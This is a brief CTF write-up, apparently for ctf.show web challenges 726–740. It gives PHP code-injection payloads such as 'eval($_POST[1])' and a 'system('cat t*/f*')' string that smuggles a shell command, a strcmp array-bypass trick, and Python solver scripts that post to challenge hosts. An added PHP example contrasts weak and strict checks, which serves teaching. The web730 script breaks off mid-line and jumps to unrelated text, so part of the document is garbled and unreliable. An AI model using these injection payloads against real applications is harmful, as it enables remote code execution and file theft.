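Because there are many challenges, much of this is written rather briefly. I hope you will bear with me, and I wish everyone grows stronger!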
web726
username=;eval($_POST[1]);phpinfo();//
username=%00
Same as the earlier web692.
Auto-increment bypass
Pass in code=xxx&_=phpinfo(); and don't forget to URL-encode it.
web728
The flag is in the template directory.
code=',system('cat t*/f*'));//
This is equivalent to
strpos('',system('cat t*/f*'));//', '..') === false
strpos('',system('cat t*/f*'));
web729
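strcmp can be bypassed with an array. The check below requires the submitted secret to have a length of 21 and a value equal to 6543, so just pad zeros onto the end.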
GET:
?secret=6543.0000000000000000
POST:
flag[]=1
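The two behaviours described above, as an added example that is not from the original post or the challenge source: a check of that shape next to a strict version. `SAMPLE_FLAG`, `weak_check` and `strict_check` are assumed names, and the flag value is constructed.

```php
<?php
// Added example. SAMPLE_FLAG and both function names are assumptions; the
// challenge's real source is not shown in the write-up.
const SAMPLE_FLAG = 'flag{constructed-sample}';

// Weak form: loose comparisons and an unchecked strcmp() result.
function weak_check($secret, $flag): bool
{
    // A numeric string is compared to 6543 as a number, so a trailing
    // ".000..." still matches while satisfying the length requirement.
    $secretOk = strlen($secret) == 21 && $secret == 6543;
    // PHP 7: strcmp(array, string) warns and returns NULL, and NULL == 0 is true.
    // PHP 8: the same call throws TypeError.
    $flagOk = @strcmp($flag, SAMPLE_FLAG) == 0;
    return $secretOk && $flagOk;
}

// Strict form: type-check first, then compare exact values.
function strict_check($secret, $flag): bool
{
    if (!is_string($secret) || !is_string($flag)) {
        return false;               // arrays from name[]=... are rejected here
    }
    if (!ctype_digit($secret) || strlen($secret) !== 21) {
        return false;               // digits only, so "6543.000..." is rejected
    }
    return (int)$secret === 6543 && hash_equals(SAMPLE_FLAG, $flag);
}

// Inputs as sent in the write-up: ?secret=6543.0000000000000000 and flag[]=1
$secret = '6543.0000000000000000';
$flag = ['1'];                      // PHP parses flag[]=1 into an array
try {
    var_dump(weak_check($secret, $flag));
} catch (TypeError $e) {
    echo "weak_check: TypeError on PHP 8\n";
}
var_dump(strict_check($secret, $flag));
```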
web730
https://github.com/osirislab/CSAW-CTF-2019-Finals/blob/0f9de48efda520134bfbe3f9b674ec19a4955057/web/biometric/main.py
This challenge feels more like a cryptography problem... (quite a headache). All I can do is give you the write-up directly.
import requests
import numpy as np
from scipy.optimize import minimize

def main():
    x0 = np.zeros([128]).tolist()
    res = minimize(get_score, x0, method='CG', options={'xtol': 1e-7, 'disp': True})
    print(res)
    res = get_request(res.x)
    print(res)

def get_request(encoding) -> str:
    payload = {"username": "admin", "encoding": encoding.tolist()}
    #print(encoding.tolist())
    res = requests.post("http://157d4038-cd05-4438-b0fd-632e2a5eb195.challenge.ctf.show/", json=payload)
    return res.content

def get_score(encoding)-> float:
    content = get_request(encoding)
    if str(content).find("Login Failed")
is_guest();
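The access_log class has no such method, so execution falls into the catch block. There a string is concatenated with the object, which triggers the class's __toString function and in turn runs the read function.
web740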
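import requests
import hashlib

a = []
url = "http://381ec5bf-2b46-4fcb-ac3d-38e92fcacd20.challenge.ctf.show/"
# For each of the 32 hex positions, find a small integer whose MD5 has '6' at that position.
for i in range(0, 32):
    for j in range(1000):
        md5 = hashlib.md5(str(j).encode(encoding='UTF-8')).hexdigest()
        if '6' == md5[i]:
            a.append(j)
            break
# Submit each integer as hash and print the i-th character of the response.
for i in range(len(a)):
    data = {'hash': a[i]}
    r = requests.post(url, data=data)
    print(r.text[i], end='')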